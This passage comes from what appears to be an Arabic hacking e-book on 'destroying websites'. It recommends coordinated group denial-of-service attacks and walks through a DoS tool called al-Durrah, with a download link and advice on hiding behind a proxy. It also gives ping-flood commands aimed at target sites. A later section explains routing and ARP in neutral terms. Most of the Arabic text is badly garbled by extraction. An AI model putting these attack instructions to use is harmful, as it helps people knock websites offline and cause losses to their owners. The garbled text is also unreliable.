‫اﻟﻄﻔﺢ ﻋﻠﻰ ﻧﻘﻄﺔ ﻣﻌﯿﻨﺔ ﻣﻦاﻟﺴﯿ ﺮﻓ ﺮ ﻣﺜ ﻞاﻟﻬﺠﻮم ﻋﻠﻰﺑﻮر تاﻹ فﺗﻲﺑﻲأو ﻏﯿ ﺮهﻷﺟ ﻞا ﺿﻌﺎ فاﺗﺼﺎ ل‬
‫ﺘﻐﻼﻟﻬﺎ ﻣﺠﺪدا ‪-‬ﺑﻌﺪ ﻋﻤ ﻞ‬‫ﺘﻢاﺳ‬‫ﻗﻌﺔاﻟﻤﻮﺟﻮدةﺑﻬﺎﻛﻲ ﯾ‬ ‫اﻟﺴﯿ ﺮﻓ ﺮ وﻓﺼ ﻞاﺗﺼﺎﻟﻪﺑﻬﺬاﺑﻬﺬااﻟﺒﻮر ت و ﻻﻟﻐﺎ ءاﻟ ﺮ‬
‫ﻗﻊاو ﺣﻮاﺟﺰ و‬ ‫ﺘﻐﻼﻟﻬﺎﻓﻲ ﻣﻌﺎودةاﻹﺗﺼﺎ لﻟﻬﺎ وﺑﺴﻬﻮﻟﺔ و دون وﺟﻮدأي ر‬ ‫ﺘﻢاﺳ‬ ‫اﻟﻜ ﺮا شﻟﻬﺎ ﻃﺒﻌﺎ ‪ -‬ﯾ‬
‫ﺳ ﺤﺐاﻟﺒﯿﺎﻧﺎ ت ﻣﻨﻬﺎ ‪.‬‬
‫و ﻫﻲ ﺷﺒﯿﻬﺔ ﻧﻮﻋﺎ ﻣﺎﺑﻌﻤﻠﯿﺔ ﺣﺠﺐاﻟﺨﺪﻣﺔ ‪- DOS -‬اذأﻧﻬﺎﺗﻘﻮمﺑﻌﻤﻠﯿﺔاوﻓ ﺮﻟﻮد ﻋﻠﻰ ﺟﺰ ء ﻣ ﺮﻛﺰ ﻣﻦ‬
‫اﻟﺴﯿ ﺮﻓ ﺮ ‪...‬‬

‫‪٨٤‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" داﯾﻨﺎﻣﯿﻜﯿﺔ ﺗﺪﻣﲑ اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﻬﺪ ف‬
‫ﻗﻊاﻟﻤﺴ‬ ‫ﺘﻲ ﯾﺼ ﺤﺒﻬﺎ ﺧﺴﺎااﺋ ﺮﻓﺎد ﺣﺔﻟﻠﻤﻮ‬
‫ﻗﻊ ﻣﻦاﻷﺷﯿﺎ ءاﻟﺴﻬﻠﺔ واﻟﻨﺎﻓﻌﺔ واﻟ‬ ‫ﯾﻌﺪﺗﺪﻣﯿ ﺮاﻟﻤﻮا‬
‫ﻗﻊ ﺧﺴﺎﺋ ﺮﺑﺎﻷ فاو‬‫ﺘﻰﻟﻮﻟﻤﺪة ﻣ ﺤﺪودهﻓﺴﯿﺨﺴ ﺮاﻟﻤﻮ‬ ‫ﻗﻊ واﯾﻘﺎﻓﻪ ﻋﻦاﻟﻌﻤ ﻞ ﺣ‬ ‫ﺣﯿﺚاذاﺗﻢﺗﺪﻣﯿ ﺮاﻟﻤﻮ‬
‫ﻗﻊ ‪.‬‬‫ﺑﺎﻟﻤﻼﯾﯿﻦ وﻋﻠﻰ ﺣﺴﺐ ﺷﻬ ﺮةاﻟﻤﻮ‬

‫ﺘ ﺮاك ﻣﺠﻤﻮﻋﺔﻛﺒﯿ ﺮه ﻻﺗﻘ ﻞﻓﻲأﻏﻠﺐاﻷ ﺣﯿﺎن ﻋﻦ ‪ ٢٠٠‬ﺷﺨ ﺺأوأﻛﺜ ﺮ‬ ‫ﺘﻢاﻻﺑﺄﺷ‬ ‫ﻗﻊ ﻻ ﯾ‬‫وﺗﺪﻣﯿ ﺮاﻟﻤﻮا‬
‫ﻗﻊﻛﺜﯿ ﺮهﺗﻘﻮمﺑﻤﺜ ﻞﻫﺬااﻷﻣ ﺮ‬ ‫ﻗﺼ ﺮ وﻫﻨﺎك ﻣﻮا‬‫ﻗ ﺖأ‬‫ﻗﻊﺑﺴ ﺮﻋﺔأﻛﺒ ﺮ وﻓﻲ و‬‫وﻛﻠﻤﺎﻛﺜ ﺮاﻟﻌﺪدﻛﻠﻤﺎﺗﻢﺗﺪﻣﯿ ﺮاﻟﻤﻮ‬
‫ﻗ ﻒ ﻃﺎﻟ ﺖ ﻣﺪﺗﻪ وﻋﺎدﺑﻌﺪ ذﻟﻚ‬ ‫ﺘ ﺮوﻧﻲاﻟﺬيﺗﻌ ﺮ ضﻟﻮ‬ ‫ﻗﻊاﻟﺠﺎداﻷﻟﻜ‬‫ﻗﻊاﻟﻤﻜﺎﻓﺢاﻟﻨﺎﺻ ﺮﻟﻸﺳﻼم ﻣﻮ‬ ‫ﻣﻨﻬﺎاﻟﻤﻮ‬
‫ﻗﻊﻛﺜﯿ ﺮه ﻋﻦ ﻃ ﺮﯾ ﻖ‬
‫ﻗﺪﺗﻢﺗﺪﻣﯿ ﺮ ﻣﻮااا‬‫ﺘﻤ ﺮﻓﻲ ﻫﺬهاﻟﻬﺠﻤﺎ ت واﻟﺠﻬﺎد و‬
‫ﻗﻊ ﻣﺴ‬ ‫ﺑﻘﻮهاﻛﺒ ﺮ وﻻ ﯾﺰا لاﻟﻤﻮ‬
‫ﻗﻊ ‪....‬‬ ‫ﺘﻌﺎون ﻣﻊ ﻫﺬااﻟﻤﻮ‬ ‫اﻟ‬

‫ﻗﻊﺗﻜﻤﻦﻓﻲاﺷﺎ ء ﻋﺪة ﻣﻨﻬﺎ ‪:‬‬ ‫وأﻟﯿﺔﺗﺪﻣﯿ ﺮاﻟﻤﻮا‬


‫ﺘﻢاﻟﺸ ﺮ ح ﻻ ﺣﻘﺎان ﺷﺎ ءا ﷲ‪.‬‬‫ﺘﻢ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﺪوسﻛﻤﺎ ﺳﯿ‬ ‫ﺘﻲﺗ‬ ‫ﺘﻘﻠﯿﺪﯾﺔاﻟ‬ ‫ﺘﺨﺪاماﻟﻄ ﺮ قاﻟ‬‫‪-١‬اﺳ‬
‫ﻗﻊاﻟﻤﻌﺎدﯾﺔ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻟﺪرة‬
‫ﺘ ﺖ ﺟﺪارﺗﻬﺎاﻣﺎماﻟﻤﻮا‬‫ﺛﺒ‬‫ﺘﻲا‬ ‫ﺘﺨﺪامﺑﻌ ﺾاﻟﺒ ﺮاﻣ ﺞاﻟﻘﻮﯾﻪ واﻟﻔﺎﻋﻠﺔاﻟ‬ ‫‪-٢‬اﺳ‬
‫ﺘﻢ ﺷ ﺮ ﺣﻪ ﻻ ﺣﻘﺎان ﺷﺎ ءا ﷲ‪...‬‬ ‫اﻟﺸﻬﯿ ﺮ‪ .‬واﻟﺬي ﺳﯿ‬

‫‪٨٥‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺷﺮح ﺑﺮﻧﺎﻣﺞ اﻟﺪرة ﻟﺘﺪﻣﲑ اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$‬‬
‫ـﻮ ل‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـ‬‫ـﻘ‬
‫ـ‬
‫ـ‬‫ـ‬
‫ـﻨ‬
‫ـ‬
‫ـ‬‫ـ‬
‫ﻣ‬
‫‪$$$$$$$$$‬‬

‫ﺣﻤ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻣﻦ ﻋﻤﻠﯿﺔﺑ ﺤﺚﺑﻮاﺳﻄﺔ ﻣﻠﻚاﻟﺒ ﺤﺚ ﺟﻮﺟ ﻞ‪.‬‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺘﻬﺎ ء ﻣﻦﺗ ﺤﻤﯿ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ‪،‬ﻓﻚ ﺿﻐﻂاﻟﻤﻠ ﻒ ‪ ،‬و ﻋﻨﺪﺗﺸﻐﯿﻠﻪ ﺳﯿﻈﻬ ﺮﻟﻚاﻟﺸﻜ ﻞاﻟ‬
‫ﻋﻨﺪاﻹﻧ‬

‫ﻟﺒﺪ ءاﻟﻬﺠﻮمﻓﻘﻂإ ﺿﻐﻂ ﻋﻠﻰ‬

‫وﻹﯾﻘﺎ فاﻟﻬﺠﻮمإ ﺿﻐﻂ ﻋﻠﻰ‬

‫ﻋﻨﺪﺑﺪ ءاﻟﻬﺠﻮم ﺳﯿﻌﻤ ﻞﺑ ﺮﻧﺎﻣ ﺞاﻟﺪرة ﻋﻠﻰﺑ ﺤﺚاﻟﺒ ﺮوﻛﺴﻲاﻟﺨﺎ صﺑﻚ و ﺳﯿ ﻀﻌﻪﻟﻚﻓﻲ ﻣﻜﺎﻧﻪ‪.‬‬

‫ﺘﺸﻐﯿ ﻞ ‪:‬‬
‫ﺘﻚ ﻋﻨﺪاﻟﻬﺠﻮمﻗﻢﺑ‬
‫ﺘﺨﻔﻲﻫﻮﯾ‬
‫وﻟ‬

‫‪٨٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺎﻟﻲ‬
‫ﻗﻢاﻟﺒ ﺮوﻛﺴﻲاﻟ‬
‫و ﺿﻊ ر‬

‫ﻗﻊاﻟﻤ ﺮاداﻟﻬﺠﻮم ﻋﻠﯿﻪ ﻫﻨﺎ‬


‫وﺳﯿﻜﻮن ﻋﻨﻮاناﻟﻤﻮ‬

‫ﻗﻊاﻟﻤ ﺮاداﻟﻬﺠﻮم‬
‫ﺘﺠﺪﯾﺪ ﻋﻨﻮاناﻟﻤﻮ‬
‫ﺘﻄﯿﻊا ﺣﺪﺗﻐﯿﯿ ﺮ ﺟﻬﺔاﻟﻬﺠﻮم وﻟ‬ ‫و ﻣﻦ ﺧﻮا صﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞاﻧﻪ ﻻ ﯾﺴ‬
‫ﺘﻐﯿﯿ ﺮ‪.‬‬
‫وﻫﻮ ﺳﯿﻘﻮمﺗﻠﻘﺎﺋﯿﺎﺑﺎﻟﺒ ﺤﺚ واﻟ‬ ‫ﻋﻠﯿﻪﻓﻘﻂﻗﻢﺑ ﻀﻐﻂ‬

‫ﺘﻲﺗﻢاﻟﻨﺠﺎ حﺑﻘﺼﻔﻬﺎﻓﻘﻂﻗﻢﺑ ﻀﻐﻂ ‪:‬‬


‫ﻗﻊاﻟ‬
‫وﻟﻤﻌ ﺮﻓﺔ آ ﺧ ﺮا ﺧﺒﺎراﻟﺒ ﺮﻧﺎﻣ ﺞ واﻟﻤﻮا‬

‫ﺘﺎﻟﻲ ‪:‬‬
‫و ﺳﯿﻈﻬ ﺮﻟﻚاﻟﺸﻜ ﻞاﻟ‬

‫ﺘﻈﻬ ﺮﻟﻚاﻷ ﺧﺒﺎر‪.‬‬


‫وﺳ‬ ‫ﻗﻢﺑ ﻀﻐﻂ‬

‫ﺘﺸﻐﯿ ﻞ ‪:‬‬
‫ﺘ ﺮﻧ ﺖ ‪،‬ﻗﻢﺑ‬
‫ﻮﻟﻌﻤ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞﺑﻄ ﺮﯾﻘﺔ ذﻛﯿﺔﺑ ﺤﯿﺚ ﻻ ﯾﺒﻄﻲ ءاﻹﻧ‬

‫‪٨٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺸﻐﯿ ﻞ ‪:‬‬
‫ﺘﺸﻐﯿ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻋﻨﺪ ﻋﻤ ﻞاﻟﻮﻧﺪوزﻗﻢﺑ‬
‫ﻟ‬

‫ﺘﺎﻟﻲ ﯾﻤﺜ ﻞ ﻋﺪداﻟﻤ ﺮا تاﻟﻨﺎﺟ ﺤﺔ ‪:‬‬


‫اﻟﺸﻜ ﻞاﻟ‬

‫و ﻫﺬا ﯾﻤﺜ ﻞ ﻋﺪداﻟﻤ ﺮا تاﻟﻔﺎﺷﻠﺔ ‪:‬‬

‫ﻮ ﺻﻠﺔﺗ ﺤﻤﯿ ﻞاﻟﺒ ﺮﻧﺎﻣ ﺞ‪..‬‬

‫‪http://www.geocities.com/boom_q8y4/dorrah.zip‬‬

‫…‬

‫‪٨٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺗﺪﻣﲑ اﳌﻮاﻗﻊ ﺑﺪون ﺑﺮاﻣﺞ "‬

‫‪$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪MaXhAk2000:‬‬
‫‪$$$$$$$$$$$$$$$$‬‬

‫ﺘﻤﻊ‬ ‫ﺘﺪﻣﯿ ﺮﻫﺎأن ﯾﺠ‬


‫ﻗﻊﺑﺪونﺑ ﺮاﻣ ﺞ وﻟﻜﻦ ﻫﻨﺎك ﺷ ﺮطﻟ‬
‫ﺘﺪﻣﯿ ﺮاﻟﻤﻮا‬
‫ﻗﻮمﺑﺸ ﺮ ح ﻋﺪة ﻃ ﺮ قﻟ‬‫ﻓﻲ ﻫﺬااﻟﺪرس ﺳﺄ‬
‫ﺘﻄﯿ ﻖاﻟﻄ ﺮﯾﻘﺔ‬
‫ﻗﻊ ﻧﻔﺴﻪ وﯾﻘﻮﻣﻮاﺑ‬‫ﻋﺪدﻛﺒﯿ ﺮﻗﺪ ﯾﺼ ﻞﻓﻲﺑﻌ ﺾاﻷ ﺣﯿﺎناﻟﻰاﻋﻠﻰ ﻣﻦ ‪ ٢٠٠‬ﺷﺨ ﺺ ﻋﻠﻰاﻟﻤﻮ‬
‫ﻗ ﺖ‪...‬‬‫ﻣﻌﺎﺑﻌ ﺾﻓﻲ ﻧﻔ ﺲاﻟﻮ‬

‫اﻟﻄ ﺮﯾﻘﺔاﻷوﻟﻰ‪::‬‬

‫ـ‬
‫ﺘﺎﻟﻲ ‪:‬‬
‫ﺘﺐاﻷﻣ ﺮاﻟ‬
‫ﺘﻮﺟﻪإﻟﻰ "اﻟﺪوس" ===<==اﻛ‬
‫ﻗﻢﺑﺎﻟ‬
‫‪Ping www.xx.com‬‬
‫ﻗﻊ ‪Xxx‬‬ ‫ﯾﻌﻨﻲاﺳﻢاﻟﻤﻮ‬
‫ﻗﻊ‪.‬‬ ‫ﻗﻢأيﺑﻲاﻟﻤﻮ‬ ‫ﺑﻌﺪ ذﻟﻚ ﺳﯿﺨ ﺮجﻟﻚ ر‬
‫ﺘﺎﺑﺔاﻷﻣ ﺮ‪:‬‬‫ﻗﻢﺑﻜ‬
‫ﻗﻮةاﻟ ﻀ ﺮﺑﻪ( ‪) -I‬ﻋﺪداﻟ ﻀ ﺮﺑﺎ ت( ‪ping -n‬‬‫ﻗﻊ( )‬ ‫)اﺳﻢاﻟﻤﻮ‬
‫ﻣﺜﺎ ل ذﻟﻚ‪:‬‬
‫‪ping -n 1000 -l 400 www.xxx.com‬‬
‫ﺎﻟﻄ ﺮﯾﻘﺔاﻟﺜﺎﻧﯿﺔ‪::‬‬

‫ﻗﻊاﻟﻤ ﺮادﺑﺎﻟﻄ ﺮﯾﻘﺔاﻟﻲﻓﻲاﻷﻋﻠﻰ‪...‬‬‫ﺘﺨ ﺮاجاﻷيﺑﻲﺗﺒﻊاﻟﻤﻮ‬ ‫ﺑﻌﺪاﺳ‬


‫ﺘﺎﺑﺔاﻷﻣ ﺮ‪:‬‬
‫ﻗﻢﺑﻜ‬
‫‪ping -t ip‬‬
‫ﻗﻊاﻟﻤﻮراد‪....‬‬‫ﺣﯿﺚ ‪ ip‬ﯾﻌﻨﻲأيﺑﻲاﻟﻤﻮ‬

‫‪٨٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻣﻌﻠﻮﻣﺎت ﻋﻦ ‪" Routing in the Internet‬‬

‫‪$$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪ACID BURN_EG:‬‬
‫‪$$$$$$$$$$$$$$$$$$‬‬

‫ﺘﻮﺻﯿ ﻞ‬ ‫ﻣﻮ ﺿﻮ ع ﻫﺎمﻟﻨﻘﻄﺔ ﻫﺎﻣﺔﻓﻲاﻟﺸﺒﻜﺎ ت واودانا ﺿﯿ ﻒا ﺿﺎﻓﺔﺑﺴﯿﻄﺔ وﻫﻲاناﻟ ﺮوﺗﯿ ﺮ ﻫﻮ ﺟﻬﺎزﻟﻠ‬


‫ﺘﺒﺎﻋﺪة )) وﻟﻤﻦ ﯾﻌ ﺮ فﻓﻜ ﺮةاﻟﺨﺐ ‪HUB‬ﻓﺎ ل ‪ Router‬ﯾﻘﻮمﺑﻨﻘ ﺲاﻟﻤﻬﻤﺔ وﻫﻮ ﺟﻬﺎز‬ ‫ﺑﯿﻦ ﻋﺪة ﺷﺒﻜﺎ ت ﻣ‬
‫ﻗﺪﻗﻤ ﺖﺑﺰﯾﺎرةﻟﺒﻌ ﺾ ﺷ ﺮﻛﺎ ت ﻣﺰودياﻟﺨﺪﻣﺔ‬ ‫ﻗﻬﺎ و‬‫ﺘﻼ فاﻟﻤﺴﺎ ﺣﺎ تاﻟﻲ ﯾﻌﻤ ﻞﻓﻲ ﻧﻄﺎ‬ ‫ﺘﻠ ﻒﻓﻲ ﺣﺠﻤﻪﺑﺎ ﺧ‬ ‫ﯾﺨ‬
‫ﺘﻮﺳﻂ ﺣﺠﻤﻪﺗﻘ ﺮﯾﺒﺎ‬ ‫ﻗﻮ لﺑﺎن ﻣ‬ ‫ﺘﻄﯿﻊانا‬‫ﻗﺎ ء وراﯾ ﺖ ﻋﺪة راوﺗ ﺮا ت وﺑﻌﺪةا ﺣﺠﺎم واﺳ‬
‫ﻋﻦ ﻃ ﺮﯾ ﻖﺑﻌ ﺾاﻻ ﺻﺪ‬
‫‪ ٤٠‬ﺳﻢ * ‪ ٥٠‬ﺳﻢ ﻋﻠﻰ ﺷﻜ ﻞ ﻣﻜﻌﺐ ‪.....‬‬

‫‪Routing in the Internet:‬‬


‫===================‬
‫!?‪what is routing‬‬
‫ﺘﻘ ﻞاﻟﻤﻌﻠﻮﻣﺎ ت ﻣﻦﻛﻤﺒﯿﻮﺗ ﺮاﻟﻰا ﺧ ﺮاو ﻣﻦﻫﻮﺳ ﺖ‬‫ﺘﻲ ﻋﻦ ﻃ ﺮﯾﻘﻬﺎﺗﻨ‬ ‫ﺎﻟ ﺮوﺗﻨ ﺞﻫﻮ ﻋﺒﺎره ﻋﻦ ﻃ ﺮﯾﻘﺔ ﻣﻌﯿﻨﺔ واﻟ‬
‫اﻟﻰ ﺎ ﺧ ﺮ‪.‬‬
‫ﺘ ﺮﻧ ﺖ ﯾﻮﺟﺪﺛﻼ ث ﻣﻈﺎﻫ ﺮ ﻣﻦاﻟ ﺮوﺗﻨ ﺞ وﻫﻢ‪:‬‬‫ﻮﻓﻰ ﺳﯿﺎ قاﻻﻧ‬
‫‪Physical Address Determination -١‬‬
‫‪Selection of inter-network gateways -٢‬‬
‫‪Symbolic and Numeric Addresses -٣‬‬

‫ﺘﻘ ﻞﺑﯿﺎﻧﺎ تا ل ‪ ip‬ﻣﻦاﻟﻜﻤﺒﯿﻮﺗ ﺮ‪.‬ﻓﻤﻦاﻟ ﻀ ﺮورىان ﻧﻐﻠ ﻒ ﻫﺬهاﻟﺒﯿﺎﻧﺎ ت‬‫ﺘﺒ ﺮاﻻو لﻫﻮ ﺎﻟﻤﻬﻢﻓﻌﻨﺪﻣﺎﺗﻨ‬‫ﻮ ﯾﻌ‬
‫ﺘﺼ ﻞﺑﻬﺎ‬ ‫ﺘﺼﻠﻪﺑﺎﻟﺸﺒﻜﺔاﻟﻤ ﺤﻠﯿﻪﻟﻠﺠﻬﺎزاوﺑﺎﻟﺸﺒﻜﺔ ﺎﻟﻤ‬ ‫ـ ‪ip‬ﺑﺄىأ ﻃﺎر ﻣﻦاى ﺻﯿﻐﻪﺗﻜﻮن ﻣ‬ ‫اﻟﺨﺎﺻﻪﺑﺎﻟ‬
‫ﺘ ﻀﻤﯿﻦ ﻣﻦ ﻋﻨﻮاناﻟﺸﺒﻜﺔ‬ ‫ﺘﻄﻠﺐﻫﺬا ﺎﻟﻐﻼ فاﻟ‬ ‫ﺘﻘﺎ لﻫﺬهاﻟﺒﯿﺎﻧﺎ ت‪ .‬و ﯾ‬
‫ﺘﻪاﻟﻤﻮﺟﻮد ﻋﻠﯿﻬﺎ ﻋﻨﺪاﻧ‬‫اﻟﺠﻬﺎزﻓﻰ ﺣﺎﻟ‬
‫اﻟﻤ ﺤﻠﯿﻪاواﻟﻌﻨﻮاناﻟﻔﯿﺰﯾﺎﺋﻰﻟﻬﺬااﻟﺸﺒﻜﻪ ﻣﻊ ﺎﻻ ﻃﺎراﻟﺬى ﯾ ﺤﯿﻂﺑﺎﻟﺒﯿﺎﻧﺎ تاى ‪(inclusion of a local‬‬
‫‪network address or physical address within the frame).‬‬

‫ﺘﻜﻮن ﻣﻦ ﻋﺪد ﻣﻦاﻟﺸﺒﻜﺎ تاﻟﻤ ﺤﻠﯿﺔ‬ ‫ﺘ ﺮﻧ ﺖﺗ‬


‫ﻮاﻟﺸﺊاﻟﺜﺎﻧﻰ ﻣﻦاﻟﻤﺬﻛﻮراﻋﻼه ﻣﻬﻢاﯾ ﻀﺎ و ﺿ ﺮورى ﻻناﻻﻧ‬
‫اى ‪ local networks‬ﻣﺮﺗﺒﻄﺔﺑﻮا ﺣﺪاوأﻛﺜ ﺮ ﻣﻦاﻟﻤﺪا ﺧ ﻞاىا ل‪ gateways.‬ﻮ ﻫﺬهاﻟﻤﺪا ﺧ ﻞ ﻋﻤﻮﻣﺎ‬
‫ﺎ ﺣﯿﺎﻧﺎ ﯾﻜﻮنﻟﻬﺎاﺗﺼﺎﻻ تﻓﯿﺰﯾﺎﺋﯿﻪاوﺑﻮرﺗﺎ ت ﻣﻊاﻟﻜﺜﯿ ﺮ ﻣﻦ‬ ‫ﺗﺴﻤﻰﺑﺎﻟ ﺮوﺗ ﺮساى ﺎ ل ‪routers ,‬‬
‫ﺘﻔﺼﯿ ﻞﺑﯿﺎﻧﺎ تا ل‪ip‬ﻫﺬا ﻣﺎ ﻧﺴﻤﯿﻪ روﺗﻨ ﺞاى ‪ routing‬ﻮ‬ ‫اﻟﺸﺒﻜﺎ ت ‪.‬وﺗ ﺤﺪﯾﺪاﻟﻤﺪ ﺧ ﻞاﻟﻤﻼﺋﻢ واﻟﺒﻮر تﻟ‬
‫ﺘ ﻀﻤﻦاﯾ ﻀﺎ دا ﺧ ﻞﺗﺒﺎد لاﻟﻤﻌﻠﻮﻣﺎ تﺑﻄ ﺮ ق ﻣﻌﯿﻨﻪ‪.‬‬
‫ﺗ‬

‫ﺘﺎﺑﻰ‬ ‫ﺘﻘﺎ لاﻟﻌﻨﻮاناىا ل ‪ address translation‬ﻣﻦاﻟﺸﻜ ﻞاﻟﻜ‬ ‫ﺘ ﻀﻤﻦاﻧ‬‫ﻮاﻟﺜﺎﻟﺚ ﻣﻦاﻟﻤﺬﻛﻮرﻫﻮاﻟﺬى ﯾ‬


‫ﺘﺼﻔﺢاى‬ ‫ﺘﻌ ﺮ ف ﻋﻠﯿﻪﺑﺴﻬﻮﻟﻪ واﻟﻤﻘﺼﻮد ﻣﺜﻼ ﻋﻨﻮاناﻟﻤ‬ ‫ﺘﻄﯿﻊاﻟ‬
‫اﻟﺬى ﻧﻌ ﺮﻓﻪ و ﻧﺴ‬
‫ﻗﻤﯿﻪ ﻣﻌﻘﺪه ﺻﻌﺒﻪ وﺗﺆدىﻫﺬهاﻟﻤﻬﻤﻪ ﻋﻦ ﻃ ﺮﯾ ﻖ‬
‫‪ http://www.3asfh.com/‬ﺎﻟﻰ ‪ ip‬ﺎىاﻟﻰ ﺎﺷﯿﺎ ء ر‬
‫ا ل‪DNS‬‬

‫‪٩٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ ‪ Physical Address‬اى ‪:‬‬


‫ﻮاﻻن ﻧﺪ ﺧ ﻞﻓﻰ ﺷ ﺮ ح ﻋﻤﻠﯿﻪﺗ ﺤﺪﯾﺪ ﺎﻟ‬

‫‪Physical Address Determination:‬‬


‫===============================‬
‫ﺘﺎجاﻟﻰان ﯾﻐﻠ ﻒﺑﺄ ﻃﺎر ﻣﺨﺼ ﺺ وﺗﺎﺑﻊﻟﻠﺸﺒﻜﺔ‬ ‫ﺎذاﻛﺎن ﯾ ﺮﯾﺪ ﺟﻬﺎزﻛﻤﺒﯿﻮﺗ ﺮان ﯾﻨﻘ ﻞ ‪ ip data‬ﺎذنﻓﺄﻧﻪ ﯾ ﺤ‬
‫ﺘﻐﻠﯿ ﻒﺑﻬﺬااﻻ ﻃﺎر ﻣﻦاﻟ ﻀ ﺮورىان ﻧ ﺤﺪد ﻣﺎ ﯾﺴﻤﻰﺑﺎ ل‬ ‫ﺘﻘﺎ لﻓﻰ ﻇ ﻞاﻟ‬ ‫ﺘﺼ ﻞاﻟﺠﻬﺎزﺑﻬﺎ‪ .‬وﻟﻨﺠﺎ ح ﻫﺬااﻻﻧ‬ ‫اﻟﻤ‬
‫ﺘﺨﺪام ﺟﺪو ل ﺳﻮ ف‬ ‫ﺘﻢﺑﻨﺠﺎ ح وﺑﺒﺴﺎ ﻃﻪ ﻋﻦ ﻃ ﺮﯾ ﻖاﺳ‬ ‫‪physical address‬ﻷﺗﺠﺎهاﻟﻜﻤﺒﯿﻮﺗ ﺮ‪ .‬وﻫﺬا ﯾ‬
‫ﺘﻮى ﻋﻠﻰ ﻋﻨﺎوﯾﻦا ل ‪ip‬‬ ‫ﯾﻮ ﺿﺢﻛﯿﻔﯿﻪﺗ ﺤﻮﯾ ﻞا ل ‪ ip‬ﺎﻟﻰ ‪ physical addresses ,‬ﻓﻤﺜﻼﻫﺬااﻟﺠﺪو ل ﯾ ﺤ‬
‫ﻟﻠﺸﺒﻜﺔ اواﻟﻌﻨﻮاناﻟﻤﻌ ﺮو فﻟﻬﺎ ‪.‬‬
‫ﺘﺨﺪمﺑ ﺮوﺗﻮﻛﻮ ل ﻣﻌﯿﻦﻟﻠ ﺤﺼﻮ ل‬ ‫ﺘﻪ ﻣﻦاﻟﻄﺒﯿﻌﻰان ﯾﻜﻮناﻟﻜﻤﺒﯿﻮﺗ ﺮ ﯾﺴ‬ ‫ﻮﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰ ﻫﺬا ﺎﻟﺠﺪو ل وﻗ ﺮاﺋ‬
‫ﻋﻠﻰﻫﺬا ﺎﻟﺠﺪو ل وﺗ ﺤﻮﯾ ﻞا ل ‪ip‬ﺎﻟﻰ ‪ physical addresses‬ﻮﻫﺬااﻟﺒ ﺮوﺗﻮﻛﻮ ل ﯾﻌ ﺮ فﺑﺄﺳﻢ ‪ ARP‬ﺎى‬
‫ﺘﻘﺪاﻧﻨﺎاﻻنادرﻛﻨﺎ وﻓﻬﻤﻨﺎ‬ ‫‪Address Resolution Protocol‬ﺎىﺑ ﺮوﺗﻮﻛﻮ لﺗ ﺤﻠﯿ ﻞاﻟﻌﻨﻮان واﻋ‬
‫ﻣﻌﻨﻰﻛﻠﻤﻪﺗ ﺤﻮﯾ ﻞا ل ‪ip‬ﺎﻟﻰ ‪ physical addresses ,‬ﻮ ﯾﻤﻜﻦان ﻧﻌ ﺮ ف ﻫﺬااﻟﺠﺪو لﺑﺄﺳﻢ ‪ARP‬‬
‫‪cache .‬‬
‫ﺘﺨﺪم ﻧﻔ ﺲاﻻﻣ ﺮ‪.‬‬ ‫ﺘﺨﺪماﻣ ﺮ ‪ arp -a‬ﻮﻓﻰاﻟﯿﻮﻧﻜ ﺲاﯾ ﻀﺎ ﻧﺴ‬ ‫ﻮﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰاﻟﺠﺪو ل ﻧﺴ‬
‫ﻮ ﻫﺬا ﻣﺜﺎ ل ﺣﻰ ﻋﻠﻰاﻟﺠﺪو لاﻟﺬى ﯾﻈﻬ ﺮﺑﻌﺪﺗﻨﻔﯿﺬ ﺎﻻﻣ ﺮ ‪:‬‬
‫‪C:\WINDOWS>arp -a‬‬
‫‪Interface: 62.135.9.102 on Interface 0x2‬‬
‫‪Internet Address Physical Address Type‬‬
‫‪207.46.226.17 20-53-52-43-00-00 dynamic‬‬
‫‪213.131.64.2 20-53-52-43-00-00 dynamic‬‬
‫‪213.131.65.238 20-53-52-43-00-00 dynamic‬‬
‫ﺘ ﺮﻧ ﺖ‬
‫ﺘﺼﻠﻪﺑﺠﻬﺎزىﺑﻌﺪ د ﺧﻮﻟﻰاﻟﻰاﻻﻧ‬ ‫ﺘ ﺮﻧ ﺖادرساﻟﻤﻮﺟﻮداﻣﺎﻣﻜﻢ ﻫﺬاﻫﻰ ﻋﻨﺎوﯾﻦﻛ ﻞاﻟﺸﺒﻜﺎ تاﻟﻤ‬ ‫ﺎﻻﻧ‬
